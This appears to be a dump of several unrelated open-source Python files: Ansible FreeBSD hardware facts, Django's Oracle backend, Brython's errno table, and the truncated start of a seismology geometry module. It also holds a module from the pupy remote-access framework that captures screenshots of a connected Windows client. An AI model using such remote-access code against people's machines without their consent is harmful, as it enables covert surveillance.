from ansible.module_utils.facts.utils import get_file_content, get_mount_size
class FreeBSDHardware(Hardware):
"""
FreeBSD-specific subclass of Hardware. Defines memory and CPU facts:
- memfree_mb
- memtotal_mb
- swapfree_mb
- swaptotal_mb
- processor (a list)
- processor_cores
- processor_count
- devices
"""
platform = 'FreeBSD'
DMESG_BOOT = '/var/run/dmesg.boot'
def populate(self, collected_facts=None):
hardware_facts = {}
cpu_facts = self.get_cpu_facts()
memory_facts = self.get_memory_facts()
dmi_facts = self.get_dmi_facts()
device_facts = self.get_device_facts()
mount_facts = {}
try:
mount_facts = self.get_mount_facts()
except TimeoutError:
pass
hardware_facts.update(cpu_facts)
hardware_facts.update(memory_facts)
hardware_facts.update(dmi_facts)
hardware_facts.update(device_facts)
hardware_facts.update(mount_facts)
return hardware_facts
def get_cpu_facts(self):
cpu_facts = {}
cpu_facts['processor'] = []
sysctl = self.module.get_bin_path('sysctl')
if sysctl:
rc, out, err = self.module.run_command("%s -n hw.ncpu" % sysctl, check_rc=False)
cpu_facts['processor_count'] = out.strip()
dmesg_boot = get_file_content(FreeBSDHardware.DMESG_BOOT)
if not dmesg_boot:
try:
rc, dmesg_boot, err = self.module.run_command(self.module.get_bin_path("dmesg"), check_rc=False)
except Exception:
dmesg_boot = ''
for line in dmesg_boot.splitlines():
if 'CPU:' in line:
cpu = re.sub(r'CPU:\s+', r"", line)
cpu_facts['processor'].append(cpu.strip())
if 'Logical CPUs per core' in line:
cpu_facts['processor_cores'] = line.split()[4]
return cpu_facts
def get_memory_facts(self):
memory_facts = {}
sysctl = self.module.get_bin_path('sysctl')
if sysctl:
rc, out, err = self.module.run_command("%s vm.stats" % sysctl, check_rc=False)
for line in out.splitlines():
data = line.split()
if 'vm.stats.vm.v_page_size' in line:
pagesize = int(data[1])
if 'vm.stats.vm.v_page_count' in line:
pagecount = int(data[1])
if 'vm.stats.vm.v_free_count' in line:
freecount = int(data[1])
memory_facts['memtotal_mb'] = pagesize * pagecount // 1024 // 1024
memory_facts['memfree_mb'] = pagesize * freecount // 1024 // 1024
swapinfo = self.module.get_bin_path('swapinfo')
if swapinfo:
# Get swapinfo. swapinfo output looks like:
# Device 1M-blocks Used Avail Capacity
# /dev/ada0p3 314368 0 314368 0%
#
rc, out, err = self.module.run_command("%s -k" % swapinfo)
lines = out.splitlines()
if len(lines[-1]) == 0:
lines.pop()
data = lines[-1].split()
if data[0] != 'Device':
memory_facts['swaptotal_mb'] = int(data[1]) // 1024
memory_facts['swapfree_mb'] = int(data[3]) // 1024
return memory_facts
@timeout()
def get_mount_facts(self):
mount_facts = {}
mount_facts['mounts'] = []
fstab = get_file_content('/etc/fstab')
if fstab:
for line in fstab.splitlines():
if line.startswith('#') or line.strip() == '':
continue
fields = re.sub(r'\s+', ' ', line).split()
mount_statvfs_info = get_mount_size(fields[1])
mount_info = {'mount': fields[1],
'device': fields[0],
'fstype': fields[2],
'options': fields[3]}
mount_info.update(mount_statvfs_info)
mount_facts['mounts'].append(mount_info)
return mount_facts
def get_device_facts(self):
device_facts = {}
sysdir = '/dev'
device_facts['devices'] = {}
drives = re.compile(r'(ada?\d+|da\d+|a?cd\d+)') # TODO: rc, disks, err = self.module.run_command("/sbin/sysctl kern.disks")
slices = re.compile(r'(ada?\d+s\d+\w*|da\d+s\d+\w*)')
if os.path.isdir(sysdir):
dirlist = sorted(os.listdir(sysdir))
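# sorted() lists a drive (e.g. ada0) before its slices (e.g. ada0s1), so the
# `d` bound by the drive match is still valid when the slice regex matches below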
for device in dirlist:
d = drives.match(device)
if d:
device_facts['devices'][d.group(1)] = []
s = slices.match(device)
if s:
device_facts['devices'][d.group(1)].append(s.group(1))
return device_facts
def get_dmi_facts(self):
''' learn dmi facts from system
Use dmidecode executable if available'''
dmi_facts = {}
# Fall back to using dmidecode, if available
dmi_bin = self.module.get_bin_path('dmidecode')
DMI_DICT = dict(
bios_date='bios-release-date',
bios_version='bios-version',
form_factor='chassis-type',
product_name='system-product-name',
product_serial='system-serial-number',
product_uuid='system-uuid',
product_version='system-version',
system_vendor='system-manufacturer'
)
for (k, v) in DMI_DICT.items():
if dmi_bin is not None:
(rc, out, err) = self.module.run_command('%s -s %s' % (dmi_bin, v))
if rc == 0:
# Strip out commented lines (specific dmidecode output)
# FIXME: why add the fact and then test if it is json?
dmi_facts[k] = ''.join([line for line in out.splitlines() if not line.startswith('#')])
try:
json.dumps(dmi_facts[k])
except UnicodeDecodeError:
dmi_facts[k] = 'NA'
else:
dmi_facts[k] = 'NA'
else:
dmi_facts[k] = 'NA'
return dmi_facts
class FreeBSDHardwareCollector(HardwareCollector):
_fact_class = FreeBSDHardware
_platform = 'FreeBSD'
|
shaheemirza/pupy
|
refs/heads/master
|
pupy/modules/screenshot.py
|
27
|
# -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
from pupylib.PupyModule import *
from rpyc.utils.classic import download
import os
import os.path
import textwrap
import logging
import datetime
from zlib import compress, crc32
import struct
import subprocess
__class_name__="Screenshoter"
def pil_save(filename, pixels, width, height):
from PIL import Image, ImageFile
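# row stride: width * 3 bytes (BGR) rounded up to a multiple of 4, matching the
# 4-byte alignment of Windows DIB rows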
buffer_len = (width * 3 + 3) & -4
img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1)
ImageFile.MAXBLOCK = width * height
img=img.transpose(Image.FLIP_TOP_BOTTOM)
img.save(filename, quality=95, optimize=True, progressive=True)
logging.info('Screenshot saved to %s'%filename)
class Screenshoter(PupyModule):
""" take a screenshot :) """
@windows_only
def is_compatible(self):
pass
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='screenshot', description=self.__doc__)
self.arg_parser.add_argument('-e', '--enum', action='store_true', help='enumerate screen')
self.arg_parser.add_argument('-s', '--screen', type=int, default=None, help='take a screenshot on a specific screen (default all screen on one screenshot)')
self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the screenshot for preview')
def run(self, args):
try:
os.makedirs("./data/screenshots")
except Exception:
pass
self.client.load_package("pupwinutils.screenshot")
screens=None
if args.screen is None:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors(oneshot=True)
else:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors()
if args.enum:
res=""
for i, screen in enumerate(screens):
res+="{:<3}: {}\n".format(i,screen)
return res
if args.screen is None:
args.screen=0
selected_screen=screens[args.screen]
screenshot_pixels=self.client.conn.modules["pupwinutils.screenshot"].get_pixels(selected_screen)
filepath=os.path.join("./data/screenshots","scr_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, screenshot_pixels, selected_screen["width"], selected_screen["height"])
if args.view:
subprocess.Popen(["eog",filepath])
self.success("screenshot saved to %s"%filepath)
|
sergei-maertens/django
|
refs/heads/master
|
django/db/backends/oracle/operations.py
|
3
|
from __future__ import unicode_literals
import datetime
import re
import uuid
from django.conf import settings
from django.db.backends.base.operations import BaseDatabaseOperations
from django.db.backends.utils import truncate_name
from django.utils import six, timezone
from django.utils.encoding import force_bytes, force_text
from .base import Database
from .utils import InsertIdVar, Oracle_datetime, convert_unicode
class DatabaseOperations(BaseDatabaseOperations):
compiler_module = "django.db.backends.oracle.compiler"
# Oracle uses NUMBER(11) and NUMBER(19) for integer fields.
integer_field_ranges = {
'SmallIntegerField': (-99999999999, 99999999999),
'IntegerField': (-99999999999, 99999999999),
'BigIntegerField': (-9999999999999999999, 9999999999999999999),
'PositiveSmallIntegerField': (0, 99999999999),
'PositiveIntegerField': (0, 99999999999),
}
# TODO: colorize this SQL code with style.SQL_KEYWORD(), etc.
_sequence_reset_sql = """
DECLARE
table_value integer;
seq_value integer;
BEGIN
SELECT NVL(MAX(%(column)s), 0) INTO table_value FROM %(table)s;
SELECT NVL(last_number - cache_size, 0) INTO seq_value FROM user_sequences
WHERE sequence_name = '%(sequence)s';
WHILE table_value > seq_value LOOP
SELECT "%(sequence)s".nextval INTO seq_value FROM dual;
END LOOP;
END;
/"""
def autoinc_sql(self, table, column):
# To simulate auto-incrementing primary keys in Oracle, we have to
# create a sequence and a trigger.
args = {
'sq_name': self._get_sequence_name(table),
'tr_name': self._get_trigger_name(table),
'tbl_name': self.quote_name(table),
'col_name': self.quote_name(column),
}
sequence_sql = """
DECLARE
i INTEGER;
BEGIN
SELECT COUNT(*) INTO i FROM USER_CATALOG
WHERE TABLE_NAME = '%(sq_name)s' AND TABLE_TYPE = 'SEQUENCE';
IF i = 0 THEN
EXECUTE IMMEDIATE 'CREATE SEQUENCE "%(sq_name)s"';
END IF;
END;
/""" % args
trigger_sql = """
CREATE OR REPLACE TRIGGER "%(tr_name)s"
BEFORE INSERT ON %(tbl_name)s
FOR EACH ROW
WHEN (new.%(col_name)s IS NULL)
BEGIN
SELECT "%(sq_name)s".nextval
INTO :new.%(col_name)s FROM dual;
END;
/""" % args
return sequence_sql, trigger_sql
def cache_key_culling_sql(self):
return """
SELECT cache_key
FROM (SELECT cache_key, rank() OVER (ORDER BY cache_key) AS rank FROM %s)
WHERE rank = %%s + 1
"""
def date_extract_sql(self, lookup_type, field_name):
if lookup_type == 'week_day':
# TO_CHAR(field, 'D') returns an integer from 1-7, where 1=Sunday.
return "TO_CHAR(%s, 'D')" % field_name
else:
# http://docs.oracle.com/cd/B19306_01/server.102/b14200/functions050.htm
return "EXTRACT(%s FROM %s)" % (lookup_type.upper(), field_name)
def date_interval_sql(self, timedelta):
"""
Implements the interval functionality for expressions
format for Oracle:
INTERVAL '3 00:03:20.000000' DAY(1) TO SECOND(6)
"""
minutes, seconds = divmod(timedelta.seconds, 60)
hours, minutes = divmod(minutes, 60)
days = str(timedelta.days)
day_precision = len(days)
fmt = "INTERVAL '%s %02d:%02d:%02d.%06d' DAY(%d) TO SECOND(6)"
return fmt % (days, hours, minutes, seconds, timedelta.microseconds, day_precision), []
def date_trunc_sql(self, lookup_type, field_name):
# http://docs.oracle.com/cd/B19306_01/server.102/b14200/functions230.htm#i1002084
if lookup_type in ('year', 'month'):
return "TRUNC(%s, '%s')" % (field_name, lookup_type.upper())
else:
return "TRUNC(%s)" % field_name
# Oracle crashes with "ORA-03113: end-of-file on communication channel"
# if the time zone name is passed in parameter. Use interpolation instead.
# https://groups.google.com/forum/#!msg/django-developers/zwQju7hbG78/9l934yelwfsJ
# This regexp matches all time zone names from the zoneinfo database.
_tzname_re = re.compile(r'^[\w/:+-]+$')
def _convert_field_to_tz(self, field_name, tzname):
if not settings.USE_TZ:
return field_name
if not self._tzname_re.match(tzname):
raise ValueError("Invalid time zone name: %s" % tzname)
# Convert from UTC to local time, returning TIMESTAMP WITH TIME ZONE
# and cast it back to TIMESTAMP to strip the TIME ZONE details.
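# e.g. (illustrative) field_name='"START"', tzname='Europe/Paris' produces:
# CAST((FROM_TZ("START", '0:00') AT TIME ZONE 'Europe/Paris') AS TIMESTAMP)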
return "CAST((FROM_TZ(%s, '0:00') AT TIME ZONE '%s') AS TIMESTAMP)" % (field_name, tzname)
def datetime_cast_date_sql(self, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
sql = 'TRUNC(%s)' % field_name
return sql, []
def datetime_cast_time_sql(self, field_name, tzname):
# Since `TimeField` values are stored as TIMESTAMP where only the date
# part is ignored, convert the field to the specified timezone.
field_name = self._convert_field_to_tz(field_name, tzname)
return field_name, []
def datetime_extract_sql(self, lookup_type, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
sql = self.date_extract_sql(lookup_type, field_name)
return sql, []
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
# http://docs.oracle.com/cd/B19306_01/server.102/b14200/functions230.htm#i1002084
if lookup_type in ('year', 'month'):
sql = "TRUNC(%s, '%s')" % (field_name, lookup_type.upper())
elif lookup_type == 'day':
sql = "TRUNC(%s)" % field_name
elif lookup_type == 'hour':
sql = "TRUNC(%s, 'HH24')" % field_name
elif lookup_type == 'minute':
sql = "TRUNC(%s, 'MI')" % field_name
else:
sql = "CAST(%s AS DATE)" % field_name # Cast to DATE removes sub-second precision.
return sql, []
def time_trunc_sql(self, lookup_type, field_name):
# The implementation is similar to `datetime_trunc_sql` as both
# `DateTimeField` and `TimeField` are stored as TIMESTAMP where
# the date part of the latter is ignored.
if lookup_type == 'hour':
sql = "TRUNC(%s, 'HH24')" % field_name
elif lookup_type == 'minute':
sql = "TRUNC(%s, 'MI')" % field_name
elif lookup_type == 'second':
sql = "CAST(%s AS DATE)" % field_name # Cast to DATE removes sub-second precision.
return sql
def get_db_converters(self, expression):
converters = super(DatabaseOperations, self).get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
if internal_type == 'TextField':
converters.append(self.convert_textfield_value)
elif internal_type == 'BinaryField':
converters.append(self.convert_binaryfield_value)
elif internal_type in ['BooleanField', 'NullBooleanField']:
converters.append(self.convert_booleanfield_value)
elif internal_type == 'DateTimeField':
converters.append(self.convert_datetimefield_value)
elif internal_type == 'DateField':
converters.append(self.convert_datefield_value)
elif internal_type == 'TimeField':
converters.append(self.convert_timefield_value)
elif internal_type == 'UUIDField':
converters.append(self.convert_uuidfield_value)
converters.append(self.convert_empty_values)
return converters
def convert_textfield_value(self, value, expression, connection, context):
if isinstance(value, Database.LOB):
value = force_text(value.read())
return value
def convert_binaryfield_value(self, value, expression, connection, context):
if isinstance(value, Database.LOB):
value = force_bytes(value.read())
return value
def convert_booleanfield_value(self, value, expression, connection, context):
if value in (0, 1):
value = bool(value)
return value
# cx_Oracle always returns datetime.datetime objects for
# DATE and TIMESTAMP columns, but Django wants to see a
# python datetime.date, .time, or .datetime.
def convert_datetimefield_value(self, value, expression, connection, context):
if value is not None:
if settings.USE_TZ:
value = timezone.make_aware(value, self.connection.timezone)
return value
def convert_datefield_value(self, value, expression, connection, context):
if isinstance(value, Database.Timestamp):
value = value.date()
return value
def convert_timefield_value(self, value, expression, connection, context):
if isinstance(value, Database.Timestamp):
value = value.time()
return value
def convert_uuidfield_value(self, value, expression, connection, context):
if value is not None:
value = uuid.UUID(value)
return value
def convert_empty_values(self, value, expression, connection, context):
# Oracle stores empty strings as null. We need to undo this in
# order to adhere to the Django convention of using the empty
# string instead of null, but only if the field accepts the
# empty string.
field = expression.output_field
if value is None and field.empty_strings_allowed:
value = ''
if field.get_internal_type() == 'BinaryField':
value = b''
return value
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def fetch_returned_insert_id(self, cursor):
return int(cursor._insert_id_var.getvalue())
def field_cast_sql(self, db_type, internal_type):
if db_type and db_type.endswith('LOB'):
return "DBMS_LOB.SUBSTR(%s)"
else:
return "%s"
def last_executed_query(self, cursor, sql, params):
# https://cx-oracle.readthedocs.io/en/latest/cursor.html#Cursor.statement
# The DB API definition does not define this attribute.
statement = cursor.statement
if statement and six.PY2 and not isinstance(statement, unicode): # NOQA: unicode undefined on PY3
statement = statement.decode('utf-8')
# Unlike Psycopg's `query` and MySQLdb's `_last_executed`, cx_Oracle's
# `statement` doesn't contain the query parameters. refs #20010.
return super(DatabaseOperations, self).last_executed_query(cursor, statement, params)
def last_insert_id(self, cursor, table_name, pk_name):
sq_name = self._get_sequence_name(table_name)
cursor.execute('SELECT "%s".currval FROM dual' % sq_name)
return cursor.fetchone()[0]
def lookup_cast(self, lookup_type, internal_type=None):
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
return "UPPER(%s)"
return "%s"
def max_in_list_size(self):
return 1000
def max_name_length(self):
return 30
def pk_default_value(self):
return "NULL"
def prep_for_iexact_query(self, x):
return x
def process_clob(self, value):
if value is None:
return ''
return force_text(value.read())
def quote_name(self, name):
# SQL92 requires delimited (quoted) names to be case-sensitive. When
# not quoted, Oracle has case-insensitive behavior for identifiers, but
# always defaults to uppercase.
# We simplify things by making Oracle identifiers always uppercase.
if not name.startswith('"') and not name.endswith('"'):
name = '"%s"' % truncate_name(name.upper(), self.max_name_length())
# Oracle puts the query text into a (query % args) construct, so % signs
# in names need to be escaped. The '%%' will be collapsed back to '%' at
# that stage so we aren't really making the name longer here.
name = name.replace('%', '%%')
return name.upper()
def random_function_sql(self):
return "DBMS_RANDOM.RANDOM"
def regex_lookup(self, lookup_type):
if lookup_type == 'regex':
match_option = "'c'"
else:
match_option = "'i'"
return 'REGEXP_LIKE(%%s, %%s, %s)' % match_option
def return_insert_id(self):
return "RETURNING %s INTO %%s", (InsertIdVar(),)
def savepoint_create_sql(self, sid):
return convert_unicode("SAVEPOINT " + self.quote_name(sid))
def savepoint_rollback_sql(self, sid):
return convert_unicode("ROLLBACK TO SAVEPOINT " + self.quote_name(sid))
def sql_flush(self, style, tables, sequences, allow_cascade=False):
# Return a list of 'TRUNCATE x;', 'TRUNCATE y;',
# 'TRUNCATE z;'... style SQL statements
if tables:
# Oracle does support TRUNCATE, but it seems to get us into
# FK referential trouble, whereas DELETE FROM table works.
sql = ['%s %s %s;' % (
style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Since we've just deleted all the rows, running our sequence
# ALTER code will reset the sequence to 0.
sql.extend(self.sequence_reset_by_name_sql(style, sequences))
return sql
else:
return []
def sequence_reset_by_name_sql(self, style, sequences):
sql = []
for sequence_info in sequences:
sequence_name = self._get_sequence_name(sequence_info['table'])
table_name = self.quote_name(sequence_info['table'])
column_name = self.quote_name(sequence_info['column'] or 'id')
query = self._sequence_reset_sql % {
'sequence': sequence_name,
'table': table_name,
'column': column_name,
}
sql.append(query)
return sql
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
query = self._sequence_reset_sql
for model in model_list:
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
table_name = self.quote_name(model._meta.db_table)
sequence_name = self._get_sequence_name(model._meta.db_table)
column_name = self.quote_name(f.column)
output.append(query % {'sequence': sequence_name,
'table': table_name,
'column': column_name})
# Only one AutoField is allowed per model, so don't
# continue to loop
break
for f in model._meta.many_to_many:
if not f.remote_field.through:
table_name = self.quote_name(f.m2m_db_table())
sequence_name = self._get_sequence_name(f.m2m_db_table())
column_name = self.quote_name('id')
output.append(query % {'sequence': sequence_name,
'table': table_name,
'column': column_name})
return output
def start_transaction_sql(self):
return ''
def tablespace_sql(self, tablespace, inline=False):
if inline:
return "USING INDEX TABLESPACE %s" % self.quote_name(tablespace)
else:
return "TABLESPACE %s" % self.quote_name(tablespace)
def adapt_datefield_value(self, value):
"""
Transform a date value to an object compatible with what is expected
by the backend driver for date columns.
The default implementation transforms the date to text, but that is not
necessary for Oracle.
"""
return value
def adapt_datetimefield_value(self, value):
"""
Transform a datetime value to an object compatible with what is expected
by the backend driver for datetime columns.
If a naive datetime is passed, it is assumed to be in UTC. Normally
Django's models.DateTimeField makes sure that, if USE_TZ is True, the
datetime passed in is timezone aware.
"""
if value is None:
return None
# cx_Oracle doesn't support tz-aware datetimes
if timezone.is_aware(value):
if settings.USE_TZ:
value = timezone.make_naive(value, self.connection.timezone)
else:
raise ValueError("Oracle backend does not support timezone-aware datetimes when USE_TZ is False.")
return Oracle_datetime.from_datetime(value)
def adapt_timefield_value(self, value):
if value is None:
return None
if isinstance(value, six.string_types):
return datetime.datetime.strptime(value, '%H:%M:%S')
# Oracle doesn't support tz-aware times
if timezone.is_aware(value):
raise ValueError("Oracle backend does not support timezone-aware times.")
return Oracle_datetime(1900, 1, 1, value.hour, value.minute,
value.second, value.microsecond)
def combine_expression(self, connector, sub_expressions):
"Oracle requires special cases for %% and & operators in query expressions"
if connector == '%%':
return 'MOD(%s)' % ','.join(sub_expressions)
elif connector == '&':
return 'BITAND(%s)' % ','.join(sub_expressions)
elif connector == '|':
raise NotImplementedError("Bit-wise or is not supported in Oracle.")
elif connector == '^':
return 'POWER(%s)' % ','.join(sub_expressions)
return super(DatabaseOperations, self).combine_expression(connector, sub_expressions)
def _get_sequence_name(self, table):
name_length = self.max_name_length() - 3
return '%s_SQ' % truncate_name(table, name_length).upper()
def _get_trigger_name(self, table):
name_length = self.max_name_length() - 3
return '%s_TR' % truncate_name(table, name_length).upper()
def bulk_insert_sql(self, fields, placeholder_rows):
return " UNION ALL ".join(
"SELECT %s FROM DUAL" % ", ".join(row)
for row in placeholder_rows
)
def subtract_temporals(self, internal_type, lhs, rhs):
if internal_type == 'DateField':
lhs_sql, lhs_params = lhs
rhs_sql, rhs_params = rhs
return "NUMTODSINTERVAL(%s - %s, 'DAY')" % (lhs_sql, rhs_sql), lhs_params + rhs_params
return super(DatabaseOperations, self).subtract_temporals(internal_type, lhs, rhs)
|
40123148/w17b
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/errno.py
|
624
|
"""
This module makes available standard errno system symbols.
The value of each symbol is the corresponding integer value,
e.g., on most systems, errno.ENOENT equals the integer 2.
The dictionary errno.errorcode maps numeric codes to symbol names,
e.g., errno.errorcode[2] could be the string 'ENOENT'.
Symbols that are not relevant to the underlying system are not defined.
To map error codes to error messages, use the function os.strerror(),
e.g. os.strerror(2) could return 'No such file or directory'.
"""
errorcode= {1: 'EPERM', 2: 'ENOENT', 3: 'ESRCH', 4: 'EINTR', 5: 'EIO',
6: 'ENXIO', 7: 'E2BIG', 8: 'ENOEXEC', 9: 'EBADF', 10: 'ECHILD', 11: 'EAGAIN',
12: 'ENOMEM', 13: 'EACCES', 14: 'EFAULT', 15: 'ENOTBLK', 16: 'EBUSY',
17: 'EEXIST', 18: 'EXDEV', 19: 'ENODEV', 20: 'ENOTDIR', 21: 'EISDIR',
22: 'EINVAL', 23: 'ENFILE', 24: 'EMFILE', 25: 'ENOTTY', 26: 'ETXTBSY',
27: 'EFBIG', 28: 'ENOSPC', 29: 'ESPIPE', 30: 'EROFS', 31: 'EMLINK',
32: 'EPIPE', 33: 'EDOM', 34: 'ERANGE', 35: 'EDEADLOCK', 36: 'ENAMETOOLONG',
37: 'ENOLCK', 38: 'ENOSYS', 39: 'ENOTEMPTY', 40: 'ELOOP', 42: 'ENOMSG',
43: 'EIDRM', 44: 'ECHRNG', 45: 'EL2NSYNC', 46: 'EL3HLT', 47: 'EL3RST',
48: 'ELNRNG', 49: 'EUNATCH', 50: 'ENOCSI', 51: 'EL2HLT', 52: 'EBADE',
53: 'EBADR', 54: 'EXFULL', 55: 'ENOANO', 56: 'EBADRQC', 57: 'EBADSLT',
59: 'EBFONT', 60: 'ENOSTR', 61: 'ENODATA', 62: 'ETIME', 63: 'ENOSR',
64: 'ENONET', 65: 'ENOPKG', 66: 'EREMOTE', 67: 'ENOLINK', 68: 'EADV',
69: 'ESRMNT', 70: 'ECOMM', 71: 'EPROTO', 72: 'EMULTIHOP', 73: 'EDOTDOT',
74: 'EBADMSG', 75: 'EOVERFLOW', 76: 'ENOTUNIQ', 77: 'EBADFD', 78: 'EREMCHG',
79: 'ELIBACC', 80: 'ELIBBAD', 81: 'ELIBSCN', 82: 'ELIBMAX', 83: 'ELIBEXEC',
84: 'EILSEQ', 85: 'ERESTART', 86: 'ESTRPIPE', 87: 'EUSERS', 88: 'ENOTSOCK',
89: 'EDESTADDRREQ', 90: 'EMSGSIZE', 91: 'EPROTOTYPE', 92: 'ENOPROTOOPT',
93: 'EPROTONOSUPPORT', 94: 'ESOCKTNOSUPPORT', 95: 'ENOTSUP',
96: 'EPFNOSUPPORT', 97: 'EAFNOSUPPORT', 98: 'EADDRINUSE',
99: 'EADDRNOTAVAIL', 100: 'ENETDOWN', 101: 'ENETUNREACH', 102: 'ENETRESET',
103: 'ECONNABORTED', 104: 'ECONNRESET', 105: 'ENOBUFS', 106: 'EISCONN',
107: 'ENOTCONN', 108: 'ESHUTDOWN', 109: 'ETOOMANYREFS', 110: 'ETIMEDOUT',
111: 'ECONNREFUSED', 112: 'EHOSTDOWN', 113: 'EHOSTUNREACH', 114: 'EALREADY',
115: 'EINPROGRESS', 116: 'ESTALE', 117: 'EUCLEAN', 118: 'ENOTNAM',
119: 'ENAVAIL', 120: 'EISNAM', 121: 'EREMOTEIO', 122: 'EDQUOT',
123: 'ENOMEDIUM', 124: 'EMEDIUMTYPE', 125: 'ECANCELED', 126: 'ENOKEY',
127: 'EKEYEXPIRED', 128: 'EKEYREVOKED', 129: 'EKEYREJECTED',
130: 'EOWNERDEAD', 131: 'ENOTRECOVERABLE', 132: 'ERFKILL'}
EPERM=1
ENOENT=2
ESRCH=3
EINTR=4
EIO=5
ENXIO=6
E2BIG=7
ENOEXEC=8
EBADF=9
ECHILD=10
EAGAIN=11
ENOMEM=12
EACCES=13
EFAULT=14
ENOTBLK=15
EBUSY=16
EEXIST=17
EXDEV=18
ENODEV=19
ENOTDIR=20
EISDIR=21
EINVAL=22
ENFILE=23
EMFILE=24
ENOTTY=25
ETXTBSY=26
EFBIG=27
ENOSPC=28
ESPIPE=29
EROFS=30
EMLINK=31
EPIPE=32
EDOM=33
ERANGE=34
EDEADLOCK=35
ENAMETOOLONG=36
ENOLCK=37
ENOSYS=38
ENOTEMPTY=39
ELOOP=40
ENOMSG=42
EIDRM=43
ECHRNG=44
EL2NSYNC=45
EL3HLT=46
EL3RST=47
ELNRNG=48
EUNATCH=49
ENOCSI=50
EL2HLT=51
EBADE=52
EBADR=53
EXFULL=54
ENOANO=55
EBADRQC=56
EBADSLT=57
EBFONT=59
ENOSTR=60
ENODATA=61
ETIME=62
ENOSR=63
ENONET=64
ENOPKG=65
EREMOTE=66
ENOLINK=67
EADV=68
ESRMNT=69
ECOMM=70
EPROTO=71
EMULTIHOP=72
EDOTDOT=73
EBADMSG=74
EOVERFLOW=75
ENOTUNIQ=76
EBADFD=77
EREMCHG=78
ELIBACC=79
ELIBBAD=80
ELIBSCN=81
ELIBMAX=82
ELIBEXEC=83
EILSEQ=84
ERESTART=85
ESTRPIPE=86
EUSERS=87
ENOTSOCK=88
EDESTADDRREQ=89
EMSGSIZE=90
EPROTOTYPE=91
ENOPROTOOPT=92
EPROTONOSUPPORT=93
ESOCKTNOSUPPORT=94
ENOTSUP=95
EPFNOSUPPORT=96
EAFNOSUPPORT=97
EADDRINUSE=98
EADDRNOTAVAIL=99
ENETDOWN=100
ENETUNREACH=101
ENETRESET=102
ECONNABORTED=103
ECONNRESET=104
ENOBUFS=105
EISCONN=106
ENOTCONN=107
ESHUTDOWN=108
ETOOMANYREFS=109
ETIMEDOUT=110
ECONNREFUSED=111
EHOSTDOWN=112
EHOSTUNREACH=113
EALREADY=114
EINPROGRESS=115
ESTALE=116
EUCLEAN=117
ENOTNAM=118
ENAVAIL=119
EISNAM=120
EREMOTEIO=121
EDQUOT=122
ENOMEDIUM=123
EMEDIUMTYPE=124
ECANCELED=125
ENOKEY=126
EKEYEXPIRED=127
EKEYREVOKED=128
EKEYREJECTED=129
EOWNERDEAD=130
ENOTRECOVERABLE=131
ERFKILL=132
|
malcolmw/SeisPy
|
refs/heads/master
|
seispy/core/geometry.py
|
3
|
# coding=utf-8
"""
This module provides basic geometric utility functions to facilitate
working in different coordinate systems.
"""
from math import acos,\
atan2,\
cos,\
degrees,\
pi,\
radians,\
sin,\
sqrt
import numpy as np
from . import constants as _constants
EARTH_RADIUS = _constants.EARTH_RADIUS
def azimuth(lat1, lon1, lat2, lon2):
"""
Return the azimuth of the line connecting points **(lat1, lon1)**
and **(lat2, lon2)**.
:param float lat1: latitude coordinate of point 1
:param float lon1: longitude coordinate of point 1
:param float lat2: latitude coordinate of point 2
:param float lon2: longitude coordinate of point 2
:returns: azimuth of the line connecting points **(lat1, lon1)**
and **(lat2, lon2)** **{Units:** degrees, **Range:** [-180,
180)}.
:rtype: float
"""
return((90 - degrees(atan2(lat2 - lat1, lon2 - lon1))))
def azimuth2radians(azimuth):
"""
Convert azimuth value (measured clockwise from North in degrees) to
a value measured in radians counter-clockwise from East.
:param float azimuth: azimuth in degrees
:returns: equivalent of azimuth in radians
:rtype: float
"""
return(pi/2 - radians(azimuth))
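# e.g. (illustrative) azimuth2radians(0) == pi/2 (due North) and
# azimuth2radians(90) == 0.0 (due East)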
def az2rad(azimuth):
"""
Convenience wrapper of :func:`azimuth2radians`.
"""
return(azimuth2radians(azimuth))
def coordinates(lat0, lon0, azimuth, distance):
"""
